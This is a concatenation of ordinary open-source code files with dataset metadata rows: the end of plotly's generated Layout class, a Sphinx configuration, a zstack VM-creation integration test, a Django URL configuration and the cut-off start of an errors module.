Legacy polar charts are deprecated! Please switch to
"polar" subplots. Sets the direction corresponding to
positive angles in legacy polar charts.
dragmode
Determines the mode of drag interactions. "select" and
"lasso" apply only to scatter traces with markers or
text. "orbit" and "turntable" apply only to 3D scenes.
extendpiecolors
If `true`, the pie slice colors (whether given by
`piecolorway` or inherited from `colorway`) will be
extended to three times its original length by first
repeating every color 20% lighter then each color 20%
darker. This is intended to reduce the likelihood of
reusing the same color when you have many slices, but
you can set `false` to disable. Colors provided in the
trace, using `marker.colors`, are never extended.
font
Sets the global font. Note that fonts used in traces
and other layout components inherit from the global
font.
geo
plotly.graph_objs.layout.Geo instance or dict with
compatible properties
grid
plotly.graph_objs.layout.Grid instance or dict with
compatible properties
height
Sets the plot's height (in px).
hiddenlabels
hiddenlabelssrc
Sets the source reference on plot.ly for hiddenlabels
.
hidesources
Determines whether or not a text link citing the data
source is placed at the bottom-right cored of the
figure. Has only an effect only on graphs that have
been generated via forked graphs from the plotly
service (at https://plot.ly or on-premise).
hoverdistance
Sets the default distance (in pixels) to look for data
to add hover labels (-1 means no cutoff, 0 means no
looking for data). This is only a real distance for
hovering on point-like objects, like scatter points.
For area-like objects (bars, scatter fills, etc)
hovering is on inside the area and off outside, but
these objects will not supersede hover on point-like
objects in case of conflict.
hoverlabel
plotly.graph_objs.layout.Hoverlabel instance or dict
with compatible properties
hovermode
Determines the mode of hover interactions. If
`clickmode` includes the "select" flag, `hovermode`
defaults to "closest". If `clickmode` lacks the
"select" flag, it defaults to "x" or "y" (depending on
the trace's `orientation` value) for plots based on
cartesian coordinates. For anything else the default
value is "closest".
images
plotly.graph_objs.layout.Image instance or dict with
compatible properties
imagedefaults
When used in a template (as
layout.template.layout.imagedefaults), sets the default
property values to use for elements of layout.images
legend
plotly.graph_objs.layout.Legend instance or dict with
compatible properties
mapbox
plotly.graph_objs.layout.Mapbox instance or dict with
compatible properties
margin
plotly.graph_objs.layout.Margin instance or dict with
compatible properties
modebar
plotly.graph_objs.layout.Modebar instance or dict with
compatible properties
orientation
Legacy polar charts are deprecated! Please switch to
"polar" subplots. Rotates the entire polar by the given
angle in legacy polar charts.
paper_bgcolor
Sets the color of paper where the graph is drawn.
piecolorway
Sets the default pie slice colors. Defaults to the main
`colorway` used for trace colors. If you specify a new
list here it can still be extended with lighter and
darker colors, see `extendpiecolors`.
plot_bgcolor
Sets the color of plotting area in-between x and y
axes.
polar
plotly.graph_objs.layout.Polar instance or dict with
compatible properties
radialaxis
plotly.graph_objs.layout.RadialAxis instance or dict
with compatible properties
scene
plotly.graph_objs.layout.Scene instance or dict with
compatible properties
selectdirection
When "dragmode" is set to "select", this limits the
selection of the drag to horizontal, vertical or
diagonal. "h" only allows horizontal selection, "v"
only vertical, "d" only diagonal and "any" sets no
limit.
separators
Sets the decimal and thousand separators. For example,
*. * puts a '.' before decimals and a space between
thousands. In English locales, dflt is ".," but other
locales may alter this default.
shapes
plotly.graph_objs.layout.Shape instance or dict with
compatible properties
shapedefaults
When used in a template (as
layout.template.layout.shapedefaults), sets the default
property values to use for elements of layout.shapes
showlegend
Determines whether or not a legend is drawn. Default is
`true` if there is a trace to show and any of these: a)
Two or more traces would by default be shown in the
legend. b) One pie trace is shown in the legend. c) One
trace is explicitly given with `showlegend: true`.
sliders
plotly.graph_objs.layout.Slider instance or dict with
compatible properties
sliderdefaults
When used in a template (as
layout.template.layout.sliderdefaults), sets the
default property values to use for elements of
layout.sliders
spikedistance
Sets the default distance (in pixels) to look for data
to draw spikelines to (-1 means no cutoff, 0 means no
looking for data). As with hoverdistance, distance does
not apply to area-like objects. In addition, some
objects can be hovered on but will not generate
spikelines, such as scatter fills.
template
Default attributes to be applied to the plot. This
should be a dict with format: `{'layout':
layoutTemplate, 'data': {trace_type: [traceTemplate,
...], ...}}` where `layoutTemplate` is a dict matching
the structure of `figure.layout` and `traceTemplate` is
a dict matching the structure of the trace with type
`trace_type` (e.g. 'scatter'). Alternatively, this may
be specified as an instance of
plotly.graph_objs.layout.Template. Trace templates are
applied cyclically to traces of each type. Container
arrays (eg `annotations`) have special handling: An
object ending in `defaults` (eg `annotationdefaults`)
is applied to each array item. But if an item has a
`templateitemname` key we look in the template array
for an item with matching `name` and apply that
instead. If no matching `name` is found we mark the
item invisible. Any named template item not referenced
is appended to the end of the array, so this can be
used to add a watermark annotation or a logo image, for
example. To omit one of these items on the plot, make
an item with matching `templateitemname` and `visible:
false`.
ternary
plotly.graph_objs.layout.Ternary instance or dict with
compatible properties
title
Sets the plot's title.
titlefont
Sets the title font.
updatemenus
plotly.graph_objs.layout.Updatemenu instance or dict
with compatible properties
updatemenudefaults
When used in a template (as
layout.template.layout.updatemenudefaults), sets the
default property values to use for elements of
layout.updatemenus
violingap
Sets the gap (in plot fraction) between violins of
adjacent location coordinates.
violingroupgap
Sets the gap (in plot fraction) between violins of the
same location coordinate.
violinmode
Determines how violins at the same location coordinate
are displayed on the graph. If "group", the violins are
plotted next to one another centered around the shared
location. If "overlay", the violins are plotted over
one another, you might need to set "opacity" to see
them multiple violins.
width
Sets the plot's width (in px).
xaxis
plotly.graph_objs.layout.XAxis instance or dict with
compatible properties
yaxis
plotly.graph_objs.layout.YAxis instance or dict with
compatible properties
"""
def __init__(
self,
arg=None,
angularaxis=None,
annotations=None,
annotationdefaults=None,
autosize=None,
bargap=None,
bargroupgap=None,
barmode=None,
barnorm=None,
boxgap=None,
boxgroupgap=None,
boxmode=None,
calendar=None,
clickmode=None,
colorway=None,
datarevision=None,
direction=None,
dragmode=None,
extendpiecolors=None,
font=None,
geo=None,
grid=None,
height=None,
hiddenlabels=None,
hiddenlabelssrc=None,
hidesources=None,
hoverdistance=None,
hoverlabel=None,
hovermode=None,
images=None,
imagedefaults=None,
legend=None,
mapbox=None,
margin=None,
modebar=None,
orientation=None,
paper_bgcolor=None,
piecolorway=None,
plot_bgcolor=None,
polar=None,
radialaxis=None,
scene=None,
selectdirection=None,
separators=None,
shapes=None,
shapedefaults=None,
showlegend=None,
sliders=None,
sliderdefaults=None,
spikedistance=None,
template=None,
ternary=None,
title=None,
titlefont=None,
updatemenus=None,
updatemenudefaults=None,
violingap=None,
violingroupgap=None,
violinmode=None,
width=None,
xaxis=None,
yaxis=None,
**kwargs
):
"""
Construct a new Layout object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.Layout
angularaxis
plotly.graph_objs.layout.AngularAxis instance or dict
with compatible properties
annotations
plotly.graph_objs.layout.Annotation instance or dict
with compatible properties
annotationdefaults
When used in a template (as
layout.template.layout.annotationdefaults), sets the
default property values to use for elements of
layout.annotations
autosize
Determines whether or not a layout width or height that
has been left undefined by the user is initialized on
each relayout. Note that, regardless of this attribute,
an undefined layout width or height is always
initialized on the first call to plot.
bargap
Sets the gap (in plot fraction) between bars of
adjacent location coordinates.
bargroupgap
Sets the gap (in plot fraction) between bars of the
same location coordinate.
barmode
Determines how bars at the same location coordinate are
displayed on the graph. With "stack", the bars are
stacked on top of one another With "relative", the bars
are stacked on top of one another, with negative values
below the axis, positive values above With "group", the
bars are plotted next to one another centered around
the shared location. With "overlay", the bars are
plotted over one another, you might need to an
"opacity" to see multiple bars.
barnorm
Sets the normalization for bar traces on the graph.
With "fraction", the value of each bar is divided by
the sum of all values at that location coordinate.
"percent" is the same but multiplied by 100 to show
percentages.
boxgap
Sets the gap (in plot fraction) between boxes of
adjacent location coordinates.
boxgroupgap
Sets the gap (in plot fraction) between boxes of the
same location coordinate.
boxmode
Determines how boxes at the same location coordinate
are displayed on the graph. If "group", the boxes are
plotted next to one another centered around the shared
location. If "overlay", the boxes are plotted over one
another, you might need to set "opacity" to see them
multiple boxes.
calendar
Sets the default calendar system to use for
interpreting and displaying dates throughout the plot.
clickmode
Determines the mode of single click interactions.
"event" is the default value and emits the
`plotly_click` event. In addition this mode emits the
`plotly_selected` event in drag modes "lasso" and
"select", but with no event data attached (kept for
compatibility reasons). The "select" flag enables
selecting single data points via click. This mode also
supports persistent selections, meaning that pressing
Shift while clicking, adds to / subtracts from an
existing selection. "select" with `hovermode`: "x" can
be confusing, consider explicitly setting `hovermode`:
"closest" when using this feature. Selection events are
sent accordingly as long as "event" flag is set as
well. When the "event" flag is missing, `plotly_click`
and `plotly_selected` events are not fired.
colorway
Sets the default trace colors.
datarevision
If provided, a changed value tells `Plotly.react` that
one or more data arrays has changed. This way you can
modify arrays in-place rather than making a complete
new copy for an incremental change. If NOT provided,
`Plotly.react` assumes that data arrays are being
treated as immutable, thus any data array with a
different identity from its predecessor contains new
data.
direction
Legacy polar charts are deprecated! Please switch to
"polar" subplots. Sets the direction corresponding to
positive angles in legacy polar charts.
dragmode
Determines the mode of drag interactions. "select" and
"lasso" apply only to scatter traces with markers or
text. "orbit" and "turntable" apply only to 3D scenes.
extendpiecolors
If `true`, the pie slice colors (whether given by
`piecolorway` or inherited from `colorway`) will be
extended to three times its original length by first
repeating every color 20% lighter then each color 20%
darker. This is intended to reduce the likelihood of
reusing the same color when you have many slices, but
you can set `false` to disable. Colors provided in the
trace, using `marker.colors`, are never extended.
font
Sets the global font. Note that fonts used in traces
and other layout components inherit from the global
font.
geo
plotly.graph_objs.layout.Geo instance or dict with
compatible properties
grid
plotly.graph_objs.layout.Grid instance or dict with
compatible properties
height
Sets the plot's height (in px).
hiddenlabels
hiddenlabelssrc
Sets the source reference on plot.ly for hiddenlabels
.
hidesources
Determines whether or not a text link citing the data
source is placed at the bottom-right cored of the
figure. Has only an effect only on graphs that have
been generated via forked graphs from the plotly
service (at https://plot.ly or on-premise).
hoverdistance
Sets the default distance (in pixels) to look for data
to add hover labels (-1 means no cutoff, 0 means no
looking for data). This is only a real distance for
hovering on point-like objects, like scatter points.
For area-like objects (bars, scatter fills, etc)
hovering is on inside the area and off outside, but
these objects will not supersede hover on point-like
objects in case of conflict.
hoverlabel
plotly.graph_objs.layout.Hoverlabel instance or dict
with compatible properties
hovermode
Determines the mode of hover interactions. If
`clickmode` includes the "select" flag, `hovermode`
defaults to "closest". If `clickmode` lacks the
"select" flag, it defaults to "x" or "y" (depending on
the trace's `orientation` value) for plots based on
cartesian coordinates. For anything else the default
value is "closest".
images
plotly.graph_objs.layout.Image instance or dict with
compatible properties
imagedefaults
When used in a template (as
layout.template.layout.imagedefaults), sets the default
property values to use for elements of layout.images
legend
plotly.graph_objs.layout.Legend instance or dict with
compatible properties
mapbox
plotly.graph_objs.layout.Mapbox instance or dict with
compatible properties
margin
plotly.graph_objs.layout.Margin instance or dict with
compatible properties
modebar
plotly.graph_objs.layout.Modebar instance or dict with
compatible properties
orientation
Legacy polar charts are deprecated! Please switch to
"polar" subplots. Rotates the entire polar by the given
angle in legacy polar charts.
paper_bgcolor
Sets the color of paper where the graph is drawn.
piecolorway
Sets the default pie slice colors. Defaults to the main
`colorway` used for trace colors. If you specify a new
list here it can still be extended with lighter and
darker colors, see `extendpiecolors`.
plot_bgcolor
Sets the color of plotting area in-between x and y
axes.
polar
plotly.graph_objs.layout.Polar instance or dict with
compatible properties
radialaxis
plotly.graph_objs.layout.RadialAxis instance or dict
with compatible properties
scene
plotly.graph_objs.layout.Scene instance or dict with
compatible properties
selectdirection
When "dragmode" is set to "select", this limits the
selection of the drag to horizontal, vertical or
diagonal. "h" only allows horizontal selection, "v"
only vertical, "d" only diagonal and "any" sets no
limit.
separators
Sets the decimal and thousand separators. For example,
*. * puts a '.' before decimals and a space between
thousands. In English locales, dflt is ".," but other
locales may alter this default.
shapes
plotly.graph_objs.layout.Shape instance or dict with
compatible properties
shapedefaults
When used in a template (as
layout.template.layout.shapedefaults), sets the default
property values to use for elements of layout.shapes
showlegend
Determines whether or not a legend is drawn. Default is
`true` if there is a trace to show and any of these: a)
Two or more traces would by default be shown in the
legend. b) One pie trace is shown in the legend. c) One
trace is explicitly given with `showlegend: true`.
sliders
plotly.graph_objs.layout.Slider instance or dict with
compatible properties
sliderdefaults
When used in a template (as
layout.template.layout.sliderdefaults), sets the
default property values to use for elements of
layout.sliders
spikedistance
Sets the default distance (in pixels) to look for data
to draw spikelines to (-1 means no cutoff, 0 means no
looking for data). As with hoverdistance, distance does
not apply to area-like objects. In addition, some
objects can be hovered on but will not generate
spikelines, such as scatter fills.
template
Default attributes to be applied to the plot. This
should be a dict with format: `{'layout':
layoutTemplate, 'data': {trace_type: [traceTemplate,
...], ...}}` where `layoutTemplate` is a dict matching
the structure of `figure.layout` and `traceTemplate` is
a dict matching the structure of the trace with type
`trace_type` (e.g. 'scatter'). Alternatively, this may
be specified as an instance of
plotly.graph_objs.layout.Template. Trace templates are
applied cyclically to traces of each type. Container
arrays (eg `annotations`) have special handling: An
object ending in `defaults` (eg `annotationdefaults`)
is applied to each array item. But if an item has a
`templateitemname` key we look in the template array
for an item with matching `name` and apply that
instead. If no matching `name` is found we mark the
item invisible. Any named template item not referenced
is appended to the end of the array, so this can be
used to add a watermark annotation or a logo image, for
example. To omit one of these items on the plot, make
an item with matching `templateitemname` and `visible:
false`.
ternary
plotly.graph_objs.layout.Ternary instance or dict with
compatible properties
title
Sets the plot's title.
titlefont
Sets the title font.
updatemenus
plotly.graph_objs.layout.Updatemenu instance or dict
with compatible properties
updatemenudefaults
When used in a template (as
layout.template.layout.updatemenudefaults), sets the
default property values to use for elements of
layout.updatemenus
violingap
Sets the gap (in plot fraction) between violins of
adjacent location coordinates.
violingroupgap
Sets the gap (in plot fraction) between violins of the
same location coordinate.
violinmode
Determines how violins at the same location coordinate
are displayed on the graph. If "group", the violins are
plotted next to one another centered around the shared
location. If "overlay", the violins are plotted over
one another, you might need to set "opacity" to see
them multiple violins.
width
Sets the plot's width (in px).
xaxis
plotly.graph_objs.layout.XAxis instance or dict with
compatible properties
yaxis
plotly.graph_objs.layout.YAxis instance or dict with
compatible properties
Returns
-------
Layout
"""
super(Layout, self).__init__('layout')
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.Layout
constructor must be a dict or
an instance of plotly.graph_objs.Layout"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop('skip_invalid', False)
# Import validators
# -----------------
from plotly.validators import (layout as v_layout)
# Initialize validators
# ---------------------
self._validators['angularaxis'] = v_layout.AngularAxisValidator()
self._validators['annotations'] = v_layout.AnnotationsValidator()
self._validators['annotationdefaults'] = v_layout.AnnotationValidator()
self._validators['autosize'] = v_layout.AutosizeValidator()
self._validators['bargap'] = v_layout.BargapValidator()
self._validators['bargroupgap'] = v_layout.BargroupgapValidator()
self._validators['barmode'] = v_layout.BarmodeValidator()
self._validators['barnorm'] = v_layout.BarnormValidator()
self._validators['boxgap'] = v_layout.BoxgapValidator()
self._validators['boxgroupgap'] = v_layout.BoxgroupgapValidator()
self._validators['boxmode'] = v_layout.BoxmodeValidator()
self._validators['calendar'] = v_layout.CalendarValidator()
self._validators['clickmode'] = v_layout.ClickmodeValidator()
self._validators['colorway'] = v_layout.ColorwayValidator()
self._validators['datarevision'] = v_layout.DatarevisionValidator()
self._validators['direction'] = v_layout.DirectionValidator()
self._validators['dragmode'] = v_layout.DragmodeValidator()
self._validators['extendpiecolors'
] = v_layout.ExtendpiecolorsValidator()
self._validators['font'] = v_layout.FontValidator()
self._validators['geo'] = v_layout.GeoValidator()
self._validators['grid'] = v_layout.GridValidator()
self._validators['height'] = v_layout.HeightValidator()
self._validators['hiddenlabels'] = v_layout.HiddenlabelsValidator()
self._validators['hiddenlabelssrc'
] = v_layout.HiddenlabelssrcValidator()
self._validators['hidesources'] = v_layout.HidesourcesValidator()
self._validators['hoverdistance'] = v_layout.HoverdistanceValidator()
self._validators['hoverlabel'] = v_layout.HoverlabelValidator()
self._validators['hovermode'] = v_layout.HovermodeValidator()
self._validators['images'] = v_layout.ImagesValidator()
self._validators['imagedefaults'] = v_layout.ImageValidator()
self._validators['legend'] = v_layout.LegendValidator()
self._validators['mapbox'] = v_layout.MapboxValidator()
self._validators['margin'] = v_layout.MarginValidator()
self._validators['modebar'] = v_layout.ModebarValidator()
self._validators['orientation'] = v_layout.OrientationValidator()
self._validators['paper_bgcolor'] = v_layout.PaperBgcolorValidator()
self._validators['piecolorway'] = v_layout.PiecolorwayValidator()
self._validators['plot_bgcolor'] = v_layout.PlotBgcolorValidator()
self._validators['polar'] = v_layout.PolarValidator()
self._validators['radialaxis'] = v_layout.RadialAxisValidator()
self._validators['scene'] = v_layout.SceneValidator()
self._validators['selectdirection'
] = v_layout.SelectdirectionValidator()
self._validators['separators'] = v_layout.SeparatorsValidator()
self._validators['shapes'] = v_layout.ShapesValidator()
self._validators['shapedefaults'] = v_layout.ShapeValidator()
self._validators['showlegend'] = v_layout.ShowlegendValidator()
self._validators['sliders'] = v_layout.SlidersValidator()
self._validators['sliderdefaults'] = v_layout.SliderValidator()
self._validators['spikedistance'] = v_layout.SpikedistanceValidator()
self._validators['template'] = v_layout.TemplateValidator()
self._validators['ternary'] = v_layout.TernaryValidator()
self._validators['title'] = v_layout.TitleValidator()
self._validators['titlefont'] = v_layout.TitlefontValidator()
self._validators['updatemenus'] = v_layout.UpdatemenusValidator()
self._validators['updatemenudefaults'] = v_layout.UpdatemenuValidator()
self._validators['violingap'] = v_layout.ViolingapValidator()
self._validators['violingroupgap'] = v_layout.ViolingroupgapValidator()
self._validators['violinmode'] = v_layout.ViolinmodeValidator()
self._validators['width'] = v_layout.WidthValidator()
self._validators['xaxis'] = v_layout.XAxisValidator()
self._validators['yaxis'] = v_layout.YAxisValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop('angularaxis', None)
self['angularaxis'] = angularaxis if angularaxis is not None else _v
_v = arg.pop('annotations', None)
self['annotations'] = annotations if annotations is not None else _v
_v = arg.pop('annotationdefaults', None)
self['annotationdefaults'
] = annotationdefaults if annotationdefaults is not None else _v
_v = arg.pop('autosize', None)
self['autosize'] = autosize if autosize is not None else _v
_v = arg.pop('bargap', None)
self['bargap'] = bargap if bargap is not None else _v
_v = arg.pop('bargroupgap', None)
self['bargroupgap'] = bargroupgap if bargroupgap is not None else _v
_v = arg.pop('barmode', None)
self['barmode'] = barmode if barmode is not None else _v
_v = arg.pop('barnorm', None)
self['barnorm'] = barnorm if barnorm is not None else _v
_v = arg.pop('boxgap', None)
self['boxgap'] = boxgap if boxgap is not None else _v
_v = arg.pop('boxgroupgap', None)
self['boxgroupgap'] = boxgroupgap if boxgroupgap is not None else _v
_v = arg.pop('boxmode', None)
self['boxmode'] = boxmode if boxmode is not None else _v
_v = arg.pop('calendar', None)
self['calendar'] = calendar if calendar is not None else _v
_v = arg.pop('clickmode', None)
self['clickmode'] = clickmode if clickmode is not None else _v
_v = arg.pop('colorway', None)
self['colorway'] = colorway if colorway is not None else _v
_v = arg.pop('datarevision', None)
self['datarevision'] = datarevision if datarevision is not None else _v
_v = arg.pop('direction', None)
self['direction'] = direction if direction is not None else _v
_v = arg.pop('dragmode', None)
self['dragmode'] = dragmode if dragmode is not None else _v
_v = arg.pop('extendpiecolors', None)
self['extendpiecolors'
] = extendpiecolors if extendpiecolors is not None else _v
_v = arg.pop('font', None)
self['font'] = font if font is not None else _v
_v = arg.pop('geo', None)
self['geo'] = geo if geo is not None else _v
_v = arg.pop('grid', None)
self['grid'] = grid if grid is not None else _v
_v = arg.pop('height', None)
self['height'] = height if height is not None else _v
_v = arg.pop('hiddenlabels', None)
self['hiddenlabels'] = hiddenlabels if hiddenlabels is not None else _v
_v = arg.pop('hiddenlabelssrc', None)
self['hiddenlabelssrc'
] = hiddenlabelssrc if hiddenlabelssrc is not None else _v
_v = arg.pop('hidesources', None)
self['hidesources'] = hidesources if hidesources is not None else _v
_v = arg.pop('hoverdistance', None)
self['hoverdistance'
] = hoverdistance if hoverdistance is not None else _v
_v = arg.pop('hoverlabel', None)
self['hoverlabel'] = hoverlabel if hoverlabel is not None else _v
_v = arg.pop('hovermode', None)
self['hovermode'] = hovermode if hovermode is not None else _v
_v = arg.pop('images', None)
self['images'] = images if images is not None else _v
_v = arg.pop('imagedefaults', None)
self['imagedefaults'
] = imagedefaults if imagedefaults is not None else _v
_v = arg.pop('legend', None)
self['legend'] = legend if legend is not None else _v
_v = arg.pop('mapbox', None)
self['mapbox'] = mapbox if mapbox is not None else _v
_v = arg.pop('margin', None)
self['margin'] = margin if margin is not None else _v
_v = arg.pop('modebar', None)
self['modebar'] = modebar if modebar is not None else _v
_v = arg.pop('orientation', None)
self['orientation'] = orientation if orientation is not None else _v
_v = arg.pop('paper_bgcolor', None)
self['paper_bgcolor'
] = paper_bgcolor if paper_bgcolor is not None else _v
_v = arg.pop('piecolorway', None)
self['piecolorway'] = piecolorway if piecolorway is not None else _v
_v = arg.pop('plot_bgcolor', None)
self['plot_bgcolor'] = plot_bgcolor if plot_bgcolor is not None else _v
_v = arg.pop('polar', None)
self['polar'] = polar if polar is not None else _v
_v = arg.pop('radialaxis', None)
self['radialaxis'] = radialaxis if radialaxis is not None else _v
_v = arg.pop('scene', None)
self['scene'] = scene if scene is not None else _v
_v = arg.pop('selectdirection', None)
self['selectdirection'
] = selectdirection if selectdirection is not None else _v
_v = arg.pop('separators', None)
self['separators'] = separators if separators is not None else _v
_v = arg.pop('shapes', None)
self['shapes'] = shapes if shapes is not None else _v
_v = arg.pop('shapedefaults', None)
self['shapedefaults'
] = shapedefaults if shapedefaults is not None else _v
_v = arg.pop('showlegend', None)
self['showlegend'] = showlegend if showlegend is not None else _v
_v = arg.pop('sliders', None)
self['sliders'] = sliders if sliders is not None else _v
_v = arg.pop('sliderdefaults', None)
self['sliderdefaults'
] = sliderdefaults if sliderdefaults is not None else _v
_v = arg.pop('spikedistance', None)
self['spikedistance'
] = spikedistance if spikedistance is not None else _v
_v = arg.pop('template', None)
_v = template if template is not None else _v
if _v is not None:
self['template'] = _v
_v = arg.pop('ternary', None)
self['ternary'] = ternary if ternary is not None else _v
_v = arg.pop('title', None)
self['title'] = title if title is not None else _v
_v = arg.pop('titlefont', None)
self['titlefont'] = titlefont if titlefont is not None else _v
_v = arg.pop('updatemenus', None)
self['updatemenus'] = updatemenus if updatemenus is not None else _v
_v = arg.pop('updatemenudefaults', None)
self['updatemenudefaults'
] = updatemenudefaults if updatemenudefaults is not None else _v
_v = arg.pop('violingap', None)
self['violingap'] = violingap if violingap is not None else _v
_v = arg.pop('violingroupgap', None)
self['violingroupgap'
] = violingroupgap if violingroupgap is not None else _v
_v = arg.pop('violinmode', None)
self['violinmode'] = violinmode if violinmode is not None else _v
_v = arg.pop('width', None)
self['width'] = width if width is not None else _v
_v = arg.pop('xaxis', None)
self['xaxis'] = xaxis if xaxis is not None else _v
_v = arg.pop('yaxis', None)
self['yaxis'] = yaxis if yaxis is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
| 43.279945 | 82 | 0.541344 |
7f4715a74fae0d464817a33e481f32c602b49ea2 | 2,469 | py | Python | doc/source/conf.py | jbemmel/nuage-openstack-neutron | e356c017f7e1600b72cfc26abb588c7cf636e925 | [
"Apache-2.0"
] | 14 | 2015-06-24T18:35:25.000Z | 2020-09-21T07:14:06.000Z | doc/source/conf.py | jbemmel/nuage-openstack-neutron | e356c017f7e1600b72cfc26abb588c7cf636e925 | [
"Apache-2.0"
] | 7 | 2016-01-20T18:20:28.000Z | 2020-11-18T16:04:14.000Z | doc/source/conf.py | jbemmel/nuage-openstack-neutron | e356c017f7e1600b72cfc26abb588c7cf636e925 | [
"Apache-2.0"
] | 43 | 2015-04-07T09:02:35.000Z | 2021-02-12T07:50:19.000Z | # -*- coding: utf-8 -*-
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
sys.path.insert(0, os.path.abspath('../..'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
# 'sphinx.ext.intersphinx',
'oslosphinx'
]
# autodoc generation is a bit aggressive and a nuisance when doing heavy
# text edit cycles.
# execute "export SPHINX_DEBUG=1" in your terminal to disable
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'nuage-openstack-neutron'
copyright = u'Alcatel-Lucent USA Inc'
# If true, '()' will be appended to :func: etc. cross-reference text.
add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
# html_theme_path = ["."]
# html_theme = '_theme'
# html_static_path = ['static']
# Output file base name for HTML help builder.
htmlhelp_basename = '%sdoc' % project
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index',
'%s.tex' % project,
u'%s Documentation' % project,
u'OpenStack Foundation', 'manual'),
]
# Example configuration for intersphinx: refer to the Python standard library.
# intersphinx_mapping = {'http://docs.python.org/': None}
| 32.486842 | 79 | 0.696638 |
333f1a65839bd7d26da5f0cf1278a6f817d7e4e4 | 1,547 | py | Python | integrationtest/vm/multihosts/test_create_vm.py | sherry546/zstack-woodpecker | 54a37459f2d72ce6820974feaa6eb55772c3d2ce | [
"Apache-2.0"
] | 2 | 2016-03-23T08:45:44.000Z | 2017-06-26T02:40:46.000Z | integrationtest/vm/multihosts/test_create_vm.py | KevinDavidMitnick/zstack-woodpecker | 96257faaf3c362168d008bdb47002025ad669b24 | [
"Apache-2.0"
] | null | null | null | integrationtest/vm/multihosts/test_create_vm.py | KevinDavidMitnick/zstack-woodpecker | 96257faaf3c362168d008bdb47002025ad669b24 | [
"Apache-2.0"
] | 2 | 2020-03-12T03:11:28.000Z | 2021-07-26T01:57:58.000Z | '''
New Integration Test for creating KVM VM.
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import time
import os
vm = None
def test():
global vm
vm_creation_option = test_util.VmOption()
image_name = os.environ.get('imageName_s')
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
#l3_name = os.environ.get('l3NoVlanNetworkName1')
l3_name = os.environ.get('l3VlanNetworkName1')
l3_net_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
conditions = res_ops.gen_query_conditions('type', '=', 'UserVm')
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)[0].uuid
vm_creation_option.set_l3_uuids([l3_net_uuid])
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
vm_creation_option.set_name('multihost_basic_vm')
vm = test_vm_header.ZstackTestVm()
vm.set_creation_option(vm_creation_option)
vm.create()
#time.sleep(5)
vm.check()
vm.destroy()
test_util.test_pass('Create VM Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm
if vm:
try:
vm.destroy()
except:
pass
| 31.571429 | 99 | 0.729153 |
4e32c5713fb76a3b051c87d542a8378521a94b25 | 1,103 | py | Python | instaclone/images/urls.py | chois9105/instaclone | 20b1852c05eddf018dcdfffa5a3fc355a70ade9a | [
"MIT"
] | null | null | null | instaclone/images/urls.py | chois9105/instaclone | 20b1852c05eddf018dcdfffa5a3fc355a70ade9a | [
"MIT"
] | null | null | null | instaclone/images/urls.py | chois9105/instaclone | 20b1852c05eddf018dcdfffa5a3fc355a70ade9a | [
"MIT"
] | null | null | null | from django.conf.urls import url
from . import views
urlpatterns = [
url(
regex=r'^$',
view=views.Feed.as_view(),
name='feed'
),
url(
regex=r'^(?P<image_id>[0-9]+)/$',
view=views.ImageDetail.as_view(),
name='image_detail'
),
url (
regex=r'^(?P<image_id>[0-9]+)/likes/$',
view=views.LikeImage.as_view(),
name='like_image'
),
url (
regex=r'^(?P<image_id>[0-9]+)/unlikes/$',
view=views.UnLikeImage.as_view(),
name='unlike_image'
),
url (
regex=r'^(?P<image_id>[0-9]+)/comments/$',
view=views.CommentOnImage.as_view(),
name='comment_image'
),
url (
regex=r'^(?P<image_id>[0-9]+)/comments/(?P<comment_id>[0-9]+)/$',
view=views.ModerateComments.as_view(),
name='comment_image'
),
url (
regex=r'^comments/(?P<comment_id>[0-9]+)/$',
view=views.Comment.as_view(),
name='comment'
),
url (
regex=r'^search/$',
view=views.Search.as_view(),
name='search'
)
] | 24.511111 | 73 | 0.510426 |
b82a425f683fb8c5aa38a33d70a41d2b007d47e0 | 4,528 | py | Python | flask/models/manager/errors.py | geovote/geovote-main | b848fba73c51c112cdc235f6d5240f5e8706332f | [
"MIT"
] | null | null | null | flask/models/manager/errors.py | geovote/geovote-main | b848fba73c51c112cdc235f6d5240f5e8706332f | [
"MIT"
] | 46 | 2018-12-29T22:30:21.000Z | 2019-02-04T10:47:32.000Z | flask/models/manager/errors.py | geovote/geovote-main | b848fba73c51c112cdc235f6d5240f5e8706332f | [
"MIT"
] | null | null | null | import re
import traceback
from sqlalchemy.exc import DataError
from sqlalchemy import CHAR, \
Column,\
